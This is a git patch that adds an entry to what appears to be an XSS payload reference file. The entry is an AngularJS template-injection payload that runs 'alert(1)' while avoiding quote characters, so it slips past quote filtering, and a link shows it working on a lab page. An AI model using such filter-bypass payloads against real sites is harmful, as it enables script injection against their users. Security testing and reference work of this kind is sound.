From 0266a7dd679b75feed9d592ad2ee24759111a142 Mon Sep 17 00:00:00 2001
From: Viren Pawar <vpawar1147@gmail.com>
Date: Sat, 15 Aug 2020 16:29:13 +0530
Subject: [PATCH] [Update] Added 1 payload

Added one payload which executes without any usage of single or double quotes. Helpful when you have AngularJS injection but quotes are blocked by application.
Working proof of payload here:

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
---
 XSS Injection/XSS in Angular.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md
index 1749a9a..5a2be10 100644
--- a/XSS Injection/XSS in Angular.md	
+++ b/XSS Injection/XSS in Angular.md	
@@ -149,6 +149,14 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS
 {{constructor.constructor('alert(1)')()}}
 ```
 
+### Advanced bypassing XSS
+
+AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_)
+
+```javascript
+{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
+```
+
 
 ### Blind XSS